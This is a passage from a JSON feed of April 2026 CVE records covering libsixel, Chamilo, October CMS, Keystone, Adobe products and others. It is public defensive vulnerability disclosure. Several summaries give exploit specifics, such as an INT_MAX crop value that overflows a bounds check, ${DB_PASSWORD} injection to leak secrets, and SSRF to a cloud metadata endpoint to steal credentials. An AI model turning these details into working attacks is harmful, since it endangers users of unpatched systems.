Because the public API explicitly provides sixel_frame_ref() to retain a frame and sixel_frame_get_pixels() to access the raw pixel buffer, a callback following this documented usage pattern will hold a dangling pointer after the second frame is decoded, resulting in a heap use-after-free confirmed by ASAN. Any application using sixel_helper_load_image_file() with a multi-frame callback to process user-supplied animated GIFs is affected, with a reliable crash as the minimum impact and potential for code execution. This issue has been fixed in version 1.8.7-r1.","cvss":7.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.0,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saitoha/libsixel/releases/tag/v1.8.7-r1","https://github.com/saitoha/libsixel/security/advisories/GHSA-w46f-jr9f-rgvp"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33019","summary":"libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. Versions 1.8.7 and prior contain an integer overflow leading to an out-of-bounds heap read in the --crop option handling of img2sixel, where positive coordinates up to INT_MAX are accepted without overflow-safe bounds checking. In sixel_encoder_do_clip(), the expression clip_w + clip_x overflows to a large negative value when clip_x is INT_MAX, causing the bounds guard to be skipped entirely, and the unclamped coordinate is passed through sixel_frame_clip() to clip(), which computes a source pointer far beyond the image buffer and passes it to memmove(). An attacker supplying a specially crafted crop argument with any valid image can trigger an out-of-bounds read in the heap, resulting in a reliable crash and potential information disclosure. 
This issue has been fixed in version 1.8.7-r1.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saitoha/libsixel/releases/tag/v1.8.7-r1","https://github.com/saitoha/libsixel/security/advisories/GHSA-c854-ffg9-g72c"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33020","summary":"libsixel is a SIXEL encoder/decoder implementation derived from kmiya's sixel. Versions 1.8.7 and prior contain an integer overflow which leads to a heap buffer overflow via sixel_frame_convert_to_rgb888() in frame.c, where allocation size and pointer offset computations for palettised images (PAL1, PAL2, PAL4) are performed using int arithmetic before casting to size_t. For images whose pixel count exceeds INT_MAX / 4, the overflow produces an undersized heap allocation for the conversion buffer and a negative pointer offset for the normalization sub-buffer, after which sixel_helper_normalize_pixelformat() writes the full image data starting from the invalid pointer, causing massive heap corruption confirmed by ASAN. An attacker providing a specially crafted large palettised PNG can corrupt the heap of the victim process, resulting in a reliable crash and potential arbitrary code execution.\nThis issue has been fixed in version 1.8.7-r1.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/saitoha/libsixel/releases/tag/v1.8.7-r1","https://github.com/saitoha/libsixel/security/advisories/GHSA-2xgm-4x47-2x2p"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33146","summary":"Docmost is open-source collaborative wiki and documentation software. 
An authorization bypass vulnerability in versions 0.70.0 through 0.70.2 exposes restricted child page titles and text snippets through the public search endpoint (`POST /api/search/share-search`) for publicly shared content. This flaw allows unauthenticated users to enumerate and retrieve content that should remain hidden from public share viewers, leading to a confidentiality breach. Version 0.70.3 contains a patch.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/docmost/docmost/security/advisories/GHSA-qq4c-8rjr-w42c"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33193","summary":"Docmost is open-source collaborative wiki and documentation software. Versions prior to 0.70.0 are vulnerable to a stored cross-site scripting (XSS) attack due to improper handling of MIME type spoofing (GHSL-2026-052). An attacker could exploit this flaw to inject malicious scripts, potentially compromising the security of users and data. Version 0.70.0 contains a patch.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/docmost/docmost/security/advisories/GHSA-7cq4-577p-wp6p"],"published_time":"2026-04-14T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27282","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. 
Exploitation of this issue requires user interaction.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27304","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27305","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. 
Exploitation of this issue does not require user interaction.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27306","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Attacker requires elevated privileges. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":8.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27307","summary":"ColdFusion versions 2023.18, 2025.6 and earlier are affected by an Uncontrolled Resource Consumption vulnerability that could lead to application denial-of-service. A high-privileged attacker could exploit this vulnerability and exhaust system resources, reducing application speed. 
Exploitation of this issue does not require user interaction.","cvss":2.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/coldfusion/apsb26-38.html"],"published_time":"2026-04-14T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-15565","summary":"The Nexi XPay plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the redirect function in all versions up to, and including, 8.3.0. This makes it possible for unauthenticated attackers to mark pending WooCommerce orders as paid/completed.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/cartasi-x-pay/tags/8.2.0/src/classes/Nexi/WC_Gateway_XPay_Process_Completion.php#L268","https://www.wordfence.com/threat-intel/vulnerabilities/id/f420151b-c783-49b1-b0e9-e936a904278a?source=cve"],"published_time":"2026-04-14T22:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33715","summary":"Chamilo LMS is an open-source learning management system. In version 2.0-RC.2, the file public/main/inc/ajax/install.ajax.php is accessible without authentication on fully installed instances because, unlike other AJAX endpoints, it does not include the global.inc.php file that performs authentication and installation-completed checks. Its test_mailer action accepts an arbitrary Symfony Mailer DSN string from POST data and uses it to connect to an attacker-specified SMTP server, enabling Server-Side Request Forgery (SSRF) into internal networks via the SMTP protocol. 
An unauthenticated attacker can also abuse this to weaponize the Chamilo server as an open email relay for phishing and spam campaigns, with emails appearing to originate from the server's IP address. Additionally, error responses from failed SMTP connections may disclose information about internal network topology and running services. This issue has been fixed in version 2.0.0-RC.3.","cvss":7.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.2,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-mxc9-9335-45mc"],"published_time":"2026-04-14T21:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34160","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, the PENS (Package Exchange Notification Services) plugin endpoint at public/plugin/Pens/pens.php is accessible without authentication and accepts a user-controlled package-url parameter that the server fetches using curl without filtering private or internal IP addresses, enabling unauthenticated Server-Side Request Forgery (SSRF). An attacker can exploit this to probe internal network services, access cloud metadata endpoints (such as 169.254.169.254) to steal IAM credentials and sensitive instance metadata, or trigger state-changing operations on internal services via the receipt and alerts callback parameters. No authentication is required to exploit either SSRF vector, significantly increasing the attack surface. 
This issue has been fixed in version 2.0.0-RC.3.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/de4058d76fac2413afd023b1ec942e8e79579011","https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-g2xj-4cch-j276"],"published_time":"2026-04-14T21:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34161","summary":"Chamilo LMS is an open-source learning management system. In versions prior to 2.0.0-RC.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the social post attachment upload functionality, where an authenticated user can upload a malicious HTML file containing JavaScript via the /api/social_post_attachments endpoint. The uploaded file is served back from the application at the generated contentUrl without sanitization, content type restrictions, or a Content-Disposition: attachment header, causing the JavaScript to execute in the browser within the application's origin. Because the payload is stored server-side and runs in the trusted origin, an attacker can perform session hijacking, account takeover, privilege escalation (if an admin views the link), and arbitrary actions on behalf of the victim. 
This issue has been fixed in version 2.0.0-RC.3.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.1,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/7c4965e48769d1d06413836429e386816a465c7f","https://github.com/chamilo/chamilo-lms/commit/da671d66a146887be3a16eabc5dcf0a92c55f7da","https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0-RC.3","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-273p-jw9w-3g22"],"published_time":"2026-04-14T21:16:26","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25125","summary":"October is a Content Management System (CMS) and web platform. Versions prior to 3.7.14 and 4.1.10 contain a server-side information disclosure vulnerability in the INI settings parser. Because PHP's parse_ini_string() function supports ${} syntax for environment variable interpolation, attackers with Editor access could inject patterns such as ${APP_KEY} or ${DB_PASSWORD} into CMS page settings fields, causing sensitive environment variables to be resolved, stored in the template, and returned to the attacker when the page was reopened. This could enable exfiltration of credentials and secrets (database passwords, AWS keys, application keys), potentially leading to further attacks such as database access or cookie forgery. The vulnerability is only relevant when cms.safe_mode is enabled, as direct PHP injection is already possible otherwise. This issue has been fixed in versions 3.7.14 and 4.1.10. 
If users are unable to immediately upgrade, they can workaround this issue by restricting Editor tool access to fully trusted administrators only, and ensuring database and cloud service credentials are not accessible from the web server's network.","cvss":4.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.9,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/octobercms/october/security/advisories/GHSA-g6v3-wv4j-x9hg"],"published_time":"2026-04-14T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-25133","summary":"October is a Content Management System (CMS) and web platform. Versions prior to 3.7.14 and 4.1.10 contain a stored cross-site scripting (XSS) vulnerability in the SVG sanitization logic. The regex pattern used to strip event handler attributes (such as onclick or onload) could be bypassed using a crafted payload that exploits how the pattern matches attribute boundaries, allowing malicious SVG files to be uploaded through the Media Manager with embedded JavaScript. Exploitation could lead to privilege escalation if a superuser views or embeds the malicious SVG, and requires authenticated backend access with media upload permissions. The SVG must be viewed or embedded in a page for the payload to trigger. This issue has been fixed in versions 3.7.14 and 4.1.10.","cvss":4.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":4.8,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/octobercms/october/security/advisories/GHSA-gcqv-f29m-67gr"],"published_time":"2026-04-14T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27287","summary":"InCopy versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. 
An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/incopy/apsb26-33.html"],"published_time":"2026-04-14T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33714","summary":"Chamilo is an open-source learning management system (LMS). Version 2.0.0-RC.2 contains a SQL Injection vulnerability in the statistics AJAX endpoint, which is an incomplete fix for CVE-2026-30881. While CVE-2026-30881 was patched by applying Security::remove_XSS() to the date_start and date_end parameters in the get_user_registration_by_month action, the same parameters remain unsanitized in the users_active action within the same file (public/main/inc/ajax/statistics.ajax.php), where they are directly interpolated into a SQL query. An authenticated admin can exploit this to perform time-based blind SQL injection, enabling extraction of arbitrary data from the database. This issue has been fixed in version 2.0.0.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.1,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/releases/tag/v2.0.0","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-w8c4-c7r8-qgw2"],"published_time":"2026-04-14T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24893","summary":"openITCOCKPIT is an open source monitoring tool built for different monitoring engines. 
openITCOCKPIT Community Edition prior to version 5.5.2 contains a command injection vulnerability that allows an authenticated user with permission to add or modify hosts to execute arbitrary OS commands on the monitoring backend. The vulnerability arises because user-controlled host attributes (specifically the host address) are expanded into monitoring command templates without validation, escaping, or quoting. These templates are later executed by the monitoring engine (Nagios/Icinga) via a shell, resulting in remote code execution. Version 5.5.2 patches the issue.","cvss":8.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openITCOCKPIT/openITCOCKPIT/releases/tag/openITCOCKPIT-5.5.2","https://github.com/openITCOCKPIT/openITCOCKPIT/security/advisories/GHSA-789q-pw85-j2q2","https://openitcockpit.io/blog/posts/2026/2026-04-14-openitcockpit-agent-3.6.0-and-5.5.2"],"published_time":"2026-04-14T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40683","summary":"In OpenStack Keystone before 28.0.1, the LDAP identity backend does not convert the user enabled attribute to a boolean when the user_enabled_invert configuration option is False (the default). The _ldap_res_to_model method in the UserApi class only performed string-to-boolean conversion when user_enabled_invert was True. When False, the raw string value from LDAP (e.g., \"FALSE\") was used directly. Since non-empty strings are truthy in Python, users marked as disabled in LDAP were treated as enabled by Keystone, allowing them to authenticate and perform actions. 
All deployments using the LDAP identity backend without user_enabled_invert=True or user_enabled_emulation are affected.","cvss":7.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://bugs.launchpad.net/keystone/+bug/2121152","https://bugs.launchpad.net/keystone/+bug/2141713","https://review.opendev.org/958205","https://www.openwall.com/lists/oss-security/2026/04/14/9"],"published_time":"2026-04-14T20:16:48","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34618","summary":"Illustrator versions 30.2, 29.8.5 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/illustrator/apsb26-42.html"],"published_time":"2026-04-14T20:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34630","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27289","summary":"Photoshop Desktop versions 27.4 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/photoshop/apsb26-40.html"],"published_time":"2026-04-14T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27310","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27311","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27312","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27313","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27222","summary":"Bridge versions 16.0.2, 15.1.4 and earlier are affected by a Divide By Zero vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application or render it unresponsive. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/bridge/apsb26-39.html"],"published_time":"2026-04-14T20:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34624","summary":"Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. 
Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html"],"published_time":"2026-04-14T19:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34625","summary":"Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. Exploitation of this issue requires user interaction in that a victim must visit a crafted webpage.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html"],"published_time":"2026-04-14T19:16:38","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34623","summary":"Adobe Experience Manager versions 6.5.24, FP11.7 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this issue by manipulating the DOM environment to execute malicious JavaScript within the context of the victim's browser. 
Exploitation of this issue requires user interaction in that a victim must visit a specially crafted web page.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/aem-screens/apsb26-34.html"],"published_time":"2026-04-14T19:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5752","summary":"Sandbox Escape Vulnerability in Terrarium allows arbitrary code execution with root privileges on a host process via JavaScript prototype chain traversal.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/cohere-ai/cohere-terrarium","https://kb.cert.org/vuls/id/414811"],"published_time":"2026-04-14T18:17:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5754","summary":"Reflected Cross-Site Scripting (XSS) Vulnerability in Radware Alteon 34.5.4.0 vADC load-balancer allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized actions, data theft, or other malicious activities.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.radware.com/products/alteon/"],"published_time":"2026-04-14T18:17:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5756","summary":"Unauthenticated Configuration File Modification Vulnerability in DRC Central Office Services (COS) allows an attacker to modify the server's configuration file, potentially leading to mass data exfiltration, malicious traffic interception, or disruption of testing 
services.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.datarecognitioncorp.com/"],"published_time":"2026-04-14T18:17:39","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34628","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T18:17:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34629","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T18:17:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34614","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. 
Scope is changed.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:17:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34615","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction. Scope is changed.","cvss":9.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.3,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:17:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34617","summary":"Adobe Connect versions 2025.3, 12.10 and earlier are affected by a Cross-Site Scripting (XSS) vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. 
Scope is changed.","cvss":8.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.7,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/connect/apsb26-37.html"],"published_time":"2026-04-14T18:17:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34627","summary":"InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://helpx.adobe.com/security/products/indesign/apsb26-32.html"],"published_time":"2026-04-14T18:17:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33825","summary":"Insufficient granularity of access control in Microsoft Defender allows an authorized attacker to elevate privileges locally.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":null,"ranking_epss":null,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33825"],"published_time":"2026-04-14T18:17:35","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33826","summary":"Improper input validation in Windows Active Directory allows an authorized attacker to execute code over an adjacent 
